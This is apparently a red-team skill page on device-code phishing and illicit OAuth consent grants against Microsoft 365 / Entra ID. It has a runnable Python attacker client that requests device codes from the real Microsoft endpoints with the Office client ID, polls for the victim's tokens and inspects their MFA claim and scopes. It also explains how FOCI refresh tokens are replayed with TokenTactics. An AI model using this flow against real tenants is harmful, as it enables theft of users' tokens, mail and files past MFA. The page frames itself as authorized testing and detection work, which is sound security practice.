attacking-oauth-with-device-code-phishing

Attacking OAuth with Device-Code Phishing

Legal Notice: This skill is for authorized security testing, red-team engagements, and educational purposes only. Device-code and consent-grant phishing manipulate real users into authorizing attacker-controlled access to corporate identities. Execute only against tenants you own or have explicit written authorization (rules of engagement) to test. Unauthorized use violates the Computer Fraud and Abuse Act and equivalent laws worldwide.

Overview

The OAuth 2.0 Device Authorization Grant (RFC 8628) was designed for input-constrained devices (smart TVs, CLI tools) that cannot easily present a browser-based login. The device posts its client_id and requested scope to the device authorization endpoint and receives a short user_code, a longer device_code, a verification URL and a polling interval. It shows the user_code and URL to the user, then polls the token endpoint with the device_code while the user authenticates on a separate, fully-featured device; the endpoint answers authorization_pending until the user finishes, slow_down if the client polls too fast, and expired_token once the code's lifetime runs out.

Attackers weaponize this flow: instead of a smart TV, the "device" is the attacker's machine. The attacker initiates the device-code request, then phishes a victim to visit the legitimate Microsoft verification page (https://microsoft.com/devicelogin) and enter the attacker-generated user_code. Because the victim authenticates on the genuine Microsoft login page, completing MFA there, the resulting tokens are minted to the attacker's polling session. The second factor is never bypassed in the cryptographic sense; it is satisfied by the victim, and the issued access token even carries the "mfa" authentication-method (amr) claim, but the bearer tokens land with the attacker (MITRE ATT&CK T1528, Steal Application Access Token). The window is short: an Entra ID device code expires after 15 minutes (the devicecode response returns expires_in of 900 seconds), so the lure must land and be acted on inside that window or the attacker must request a fresh code.

Microsoft Threat Intelligence, Volexity, and Proofpoint documented sharp growth in device-code phishing through 2025, with Russia-aligned actors (tracked by Microsoft as Storm-2372) among the most prolific. Mandiant's M-Trends reporting similarly highlights OAuth token theft as a leading cloud initial-access vector. A closely related technique is the illicit consent grant ("OAuth phishing"): the attacker registers a multi-tenant app and tricks the victim into clicking an /adminconsent or user-consent URL, granting the malicious app delegated Microsoft Graph permissions (Mail.Read, Files.ReadWrite.All, offline_access) that persist independently of password resets. This skill covers both, plus token replay across Microsoft 365 services using TokenTactics and validation/access mapping with ROADtools.

The defining property red teams exploit: access tokens minted via the device-code flow are valid for roughly 60–90 minutes (the Entra ID default lifetime is randomized in that range), but the accompanying refresh token, issued when offline_access is in scope, survives for up to 90 days and can be redeemed for fresh access tokens. Because Microsoft's first-party public clients (Microsoft Office, Azure CLI, Teams and others) belong to a Family of Client IDs (FOCI), a refresh token issued to one family member can be redeemed for access tokens for any other member's resources: Outlook, SharePoint, Teams, Azure Resource Manager. This is the mechanism TokenTactics automates, and it yields durable access whose tokens continue to carry the MFA claim. Unlike the consent-grant path, this access is still tied to the user's session: a password reset or an explicit session revocation (Microsoft Graph revokeSignInSessions) invalidates the refresh token, so defenders who detect the sign-in can cut it off.
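The attacker-side client loop described above (request a device code, hand the user_code to the victim, poll the token endpoint while honoring authorization_pending, slow_down and expiry, then inspect what the issued token claims) as an added example. This is not code from the skill or from TokenTactics; it uses the real Entra v2.0 endpoint URLs and the publicly documented Microsoft Office client ID, but the token endpoint is replaced by a constructed in-memory stand-in and the access token is a constructed, unsigned JWT so the block runs offline. The `post` callable is an assumed transport interface; with network access it would wrap `requests.post(...).json()`.

```python
"""RFC 8628 device-code client loop as an attacker would run it, simulated offline."""
import base64
import json
import time

# Real Entra ID v2.0 endpoints for the device authorization grant.
DEVICE_CODE_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/devicecode"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"
# Publicly documented client ID of the Microsoft Office first-party public client (a FOCI member).
OFFICE_CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"


def device_code_request(client_id=OFFICE_CLIENT_ID,
                        scope="https://graph.microsoft.com/.default offline_access"):
    """Form body for the initial POST to DEVICE_CODE_URL; offline_access asks for a refresh token."""
    return {"client_id": client_id, "scope": scope}


def token_poll_request(client_id, device_code):
    """Form body the client repeats against TOKEN_URL until the victim authorises."""
    return {"client_id": client_id, "grant_type": DEVICE_CODE_GRANT, "device_code": device_code}


def poll_for_token(post, device_code, interval, expires_in,
                   client_id=OFFICE_CLIENT_ID, sleep=time.sleep):
    """Poll per RFC 8628 section 3.5: wait `interval` between polls, add 5 s on slow_down,
    give up when the code's lifetime (expires_in) has elapsed or the server ends the flow.
    `sleep` is injectable so the loop can be driven without real waiting."""
    elapsed = 0
    while elapsed < expires_in:
        sleep(interval)
        elapsed += interval
        resp = post(TOKEN_URL, token_poll_request(client_id, device_code))
        if "access_token" in resp:
            return resp                      # victim entered the code and finished MFA
        err = resp.get("error")
        if err == "authorization_pending":
            continue
        if err == "slow_down":
            interval += 5                    # RFC 8628 mandates backing off by 5 s
            continue
        raise RuntimeError(f"device code flow ended: {err}")  # expired_token, access_denied, ...
    raise RuntimeError("device code expired before the victim authorised it")


def decode_jwt_claims(token):
    """Decode the payload of a JWT without verifying it (inspection only, not trust)."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def summarise_token(access_token):
    """What the attacker learns from the issued token: audience, victim, whether Entra
    recorded MFA (amr contains 'mfa'), lifetime in minutes, and delegated scopes."""
    c = decode_jwt_claims(access_token)
    return {"aud": c.get("aud"), "upn": c.get("upn"),
            "mfa_claimed": "mfa" in c.get("amr", []),
            "lifetime_min": (c["exp"] - c["iat"]) // 60,
            "scp": c.get("scp")}


# ---- constructed stand-ins so the demo runs offline -------------------------------
def make_unsigned_jwt(claims):
    """Constructed sample token: header.payload.signature with a dummy signature."""
    def b64(d):
        return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{b64({'alg': 'RS256', 'typ': 'JWT'})}.{b64(claims)}.constructed-signature"


def make_fake_endpoint(responses):
    """Constructed token endpoint that replays scripted JSON responses in order."""
    it = iter(responses)

    def post(url, form):
        if url != TOKEN_URL or form["grant_type"] != DEVICE_CODE_GRANT:
            raise ValueError("unexpected request")
        return next(it)
    return post


SAMPLE_CLAIMS = {  # constructed claims mimicking an Entra access token for Graph
    "aud": "https://graph.microsoft.com", "upn": "victim@contoso.example",
    "amr": ["pwd", "mfa"], "iat": 1700000000, "exp": 1700000000 + 75 * 60,
    "scp": "Mail.Read Files.ReadWrite.All",
}


def run_demo():
    """Drive the loop through pending -> slow_down -> pending -> token; return sleeps and summary."""
    post = make_fake_endpoint([
        {"error": "authorization_pending"},
        {"error": "slow_down"},
        {"error": "authorization_pending"},
        {"token_type": "Bearer", "expires_in": 4500,
         "access_token": make_unsigned_jwt(SAMPLE_CLAIMS),
         "refresh_token": "constructed-refresh-token"},
    ])
    sleeps = []
    tokens = poll_for_token(post, "constructed-device-code", interval=5,
                            expires_in=900, sleep=sleeps.append)
    return sleeps, summarise_token(tokens["access_token"])


if __name__ == "__main__":
    print(run_demo())
```

The summary's `mfa_claimed` is the point of the technique: the attacker never touched a second factor, yet the token Entra issued records one, so any downstream check that merely looks for the mfa claim is satisfied. On a live engagement the stand-ins are swapped for `requests` calls, and the refresh token in the final response is what TokenTactics would then redeem for other FOCI resources.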

When to Use

  • During an authorized red-team or assumed-breach engagement targeting Microsoft 365 / Entra ID where social-engineering is in scope
  • When validating Conditional Access policies, MFA enforcement, and token-protection controls against real phishing techniques
  • When testing whether an organization restricts the OAuth device-code flow (for example with the Conditional Access "Authentication flows" condition) or blocks unverified multi-tenant app consent
  • When demonstrating MFA-bypass risk to justify phishing-resistant authentication (FIDO2) and token-binding controls
  • When building detections (paired with the blue-team hunting-saas-sso-token-abuse skill) and you need realistic telemetry
attacking-oauth-with-device-code-phishing — mukul975/anthropic-cybersecurity-skills